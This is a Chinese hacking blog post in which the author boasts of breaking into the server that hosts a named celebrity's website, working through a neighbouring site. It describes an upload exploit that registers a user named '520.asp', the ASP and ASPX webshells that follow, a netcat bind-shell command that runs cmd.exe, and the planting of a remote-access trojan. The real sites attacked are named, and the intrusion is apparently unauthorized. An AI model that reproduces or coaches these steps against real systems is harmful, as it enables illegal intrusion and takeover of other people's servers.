这几天啊，搞国外的搞的真没劲。把目标转向国内。

http://www.wanghan.net/  无意发现汪涵大哥的官方网站，嘿嘿。玩玩！

废话不多说，进入正题。

主站全是htm页面，后台也找不到，还有个Discuz6.0论坛，看着就晕。

看来只有旁注了。

网站仍到114best查询，结果如图：

------------------------------------------------------------------------------------------------

前两个是PJBLOG，不用看了，后两个很可疑，就他们了吧。

漏洞在最后那个站，www.touzi55.com这样的站以前拿过，就是注册漏洞啦。

只要能注册为.asp的就OK了。

改注册页面代码，注册了个用户为520.asp，再上传jpg的马。轻松拿到了shell。

进去后就是提权了，服务器装了serv-U，可是没用啊，密码改了。

幸好C盘有权限浏览，要不还真没辙了。

老方法，在C:\RECYCLER上传CMD来执行命令，可是啊竟出现这样的情况，

如图：

--------------------------------------------------------------------------------------------------

ASP没权限啊，怎么办呢？网站有这个目录aspnet_client ，看来支持aspx。

于是上传个aspx的马。asp.net应该有执行权限。

--------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------

这样就好多了，继续。

下面就是NC出场了。NC上传到RECYCLER。用aspx马执行命令：

c:\RECYCLER\nc -l -p 110 -t -e c:\RECYCLER\cmd.exe

本地连它的telnet，端口110。

--------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------

哎```连不上，算了，不连。我们直接给它种鸽子，这方法百试百灵。

上传鸽子到网站根目录，用aspx执行命令c:\myweb\tuozi55\1.exe。

不一会儿，服务器上线，大功告成。其实不用NC那么麻烦。

--------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------

呵呵，我还没注意，原来服务器只有一个盘。网站都在那个myweb目录里面。

--------------------------------------

不忍心搞汪涵大哥的站，就这样吧！